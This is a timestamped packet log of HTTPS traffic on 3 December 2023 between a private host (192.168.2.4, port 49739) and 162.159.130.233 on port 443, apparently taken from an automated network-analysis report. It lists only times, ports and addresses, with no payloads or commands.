Dec 3, 2023 17:22:55.444803953 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444865942 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.444907904 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444969893 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.444986105 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.445050001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.445704937 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.445764065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.445805073 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.445858002 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.445882082 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.445930958 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.445955038 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.446000099 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.446620941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.446680069 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.446717978 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.446767092 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.446793079 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.446842909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.446866035 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.446921110 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.447490931 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.447546005 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.447587967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.447638988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.447664022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.447712898 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.447735071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.447779894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.448477983 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.448529005 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.448555946 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.448609114 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.448628902 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.448685884 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.449341059 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.449398994 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.449438095 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.449490070 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.449515104 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.449563026 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.449595928 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.449647903 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.450263023 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.450366020 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.450418949 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.450462103 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.450534105 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.450588942 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.450613976 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.450664997 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.451438904 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.451494932 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.451517105 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.451570988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.451595068 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.451649904 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.451672077 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.451716900 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.452406883 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.452474117 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.573010921 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.573275089 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.573741913 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.573813915 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.574141979 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.574213982 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.575063944 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.575135946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.575150967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.575217962 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.576617956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.576679945 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.576719999 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.576782942 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.577624083 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.577707052 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.578691006 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.578795910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.579468012 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.579543114 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.580382109 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.580449104 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.580463886 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.580532074 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.581319094 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.581409931 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.582355976 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.582434893 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.623413086 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.623590946 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.623589039 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.623620987 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.623785019 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.623785019 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.702873945 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.702980042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.708170891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.708270073 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.708268881 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.708292007 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.708324909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.708342075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.708386898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.708452940 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.708473921 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.708535910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.709141970 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.709223032 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.710130930 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.710200071 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.710793972 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.710865974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.710992098 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.711055040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.711929083 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.711997986 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.712831974 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.712924004 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.713804007 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.713869095 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.714478016 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.714541912 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.714675903 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.714734077 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.715828896 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.715893984 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.716660976 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.716730118 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.717434883 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.717500925 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.717660904 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.717724085 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.718403101 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.718465090 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.719472885 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.719544888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.720416069 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.720480919 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.720606089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.720664978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.721455097 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.721518040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.724069118 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.724101067 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.724139929 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.724154949 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.724173069 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.724181890 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.724212885 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.724241972 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.726897001 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.726939917 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.726973057 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.726979971 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.727008104 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.727019072 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.729665995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.729717970 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.729773045 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.729784966 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.729815006 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.729831934 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.731096983 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.731138945 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.731188059 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.731199980 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.731225967 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.731247902 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.732794046 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.732836962 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.732893944 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.732908964 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.732991934 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.733010054 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.735461950 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.735515118 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.735547066 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.735558987 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.735588074 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.735608101 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.758951902 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.759026051 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.759095907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.759128094 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.759259939 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.759259939 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.833952904 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.834006071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.834223986 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.834223986 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.834255934 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.834316015 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.839997053 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.840045929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.840096951 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.840111017 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.840169907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.840169907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.842691898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.842736006 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.842803001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.842816114 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.842848063 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.842869997 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.845814943 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.845858097 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.845899105 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.845911980 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.845940113 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.845961094 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.848143101 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.848213911 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.848234892 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.848248005 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.848280907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.848297119 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.851517916 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.851560116 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.851603031 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.851615906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.851646900 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.851666927 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.854309082 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.854356050 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.854404926 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.854418039 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.854446888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.854465008 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.857412100 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.857453108 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.857530117 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.857530117 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.857544899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.857594013 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.865557909 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.865618944 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.865731001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.865746975 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.865808010 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.866133928 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.866177082 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.866209030 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.866214991 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.866302013 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.866317987 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.869122028 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.869167089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.869235039 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.869251013 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.869281054 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.869309902 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.871691942 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.871732950 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.871790886 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.871798038 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.871849060 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.875628948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.875669956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.875720978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.875730991 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.875761986 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.875787973 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.877048969 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.877099991 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.877142906 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.877151966 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.877183914 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.877254963 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.879813910 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.879859924 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.879933119 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.879952908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.879976988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.879997969 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.883142948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.883214951 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.883250952 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.883300066 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.089297056 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.089613914 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.265528917 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.265580893 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265623093 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265763998 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.265784979 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265834093 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265863895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265911102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.265923977 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.265947104 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266002893 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266057014 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266122103 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266128063 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266195059 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266196012 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266242027 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266284943 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266288996 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266288996 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266309977 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266354084 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266355038 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266383886 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266398907 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266422987 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266429901 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266460896 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266463995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.266495943 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.266551018 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.477303028 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.477581978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:56.689261913 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:56.689395905 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.129266977 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.129492044 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.615740061 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.615806103 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.615871906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.615952015 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.615972996 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.616012096 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.616024971 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.616076946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.616149902 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.660466909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.660525084 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660567045 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660595894 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660659075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.660695076 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660742044 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.660757065 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660785913 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660805941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:57.660845041 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:57.660856009 CET	443	49739	162.159.130.233	192.168.2.4
